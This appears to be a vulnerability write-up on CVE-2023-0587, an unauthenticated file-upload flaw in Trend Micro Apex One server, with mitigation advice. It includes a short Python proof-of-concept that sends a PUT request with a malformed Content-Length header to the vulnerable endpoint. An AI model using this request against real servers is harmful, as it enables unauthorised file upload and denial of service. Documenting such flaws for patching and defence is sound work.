A critical file-upload vulnerability has been identified in Trend Micro Apex One server build 11110. Using a malformed Content-Length header in an HTTP PUT message, an unauthenticated remote attacker can upload arbitrary files to the SampleSubmission directory on the server. The attacker can upload a large number of large files to fill up the file system on which the Apex One server is installed.

Exploit Details

The vulnerability, identified as CVE-2023-0587, exists in the Trend Micro Apex One server build 11110. An unauthenticated remote attacker can exploit this vulnerability by sending an HTTP PUT message with a malformed Content-Length header to the URL /officescan/console/html/cgi/fcgiOfcDDA.exe.

Here is a code snippet demonstrating how an attacker could craft an HTTP PUT message with a malformed Content-Length header:

import requests

target_url = 'http://target_server_ip/officescan/console/html/cgi/fcgiOfcDDA.exe';
file_to_upload = 'path_to_file'
malformed_content_length = '999999999' 

headers = {
    "Content-Length": malformed_content_length,
    ...
}

with open(file_to_upload, 'rb') as file:
    response = requests.put(target_url, headers=headers, data=file)

By exploiting this vulnerability, the attacker can upload arbitrary files to the SampleSubmission directory (i.e., \PCCSRV\TEMP\SampleSubmission) on the server. This can potentially fill up the file system on which the Apex One server is installed, resulting in a denial of service (DoS) attack.

Original References

[1] Trend Micro Apex One - Official Documentation: (https://docs.trendmicro.com/en-us/enterprise/trend-micro-apex-one.aspx)
[2] CVE-2023-0587 - NVD - National Vulnerability Database: (https://nvd.nist.gov/vuln/detail/CVE-2023-0587)

Mitigation

Trend Micro has addressed this vulnerability in the latest update for the Apex One server. Trend Micro recommends that users update their Apex One installations to the most recent version, which includes a patch for this vulnerability. In addition to this, users should also implement network best practices, such as limiting access to the Apex One server to trusted IP addresses and using strong access controls.

Conclusion

This unauthenticated file-upload vulnerability in Trend Micro Apex One Server Build 11110 demonstrates the importance of staying up-to-date with the latest patches and updates for all software applications, especially those that are critical for your organization's security posture. By keeping your applications updated, regularly reviewing log files, and implementing proper access controls, you can greatly reduce the risks associated with these types of vulnerabilities.

Timeline

Published on: 02/01/2023 03:15:00 UTC
Last modified on: 02/07/2023 22:44:00 UTC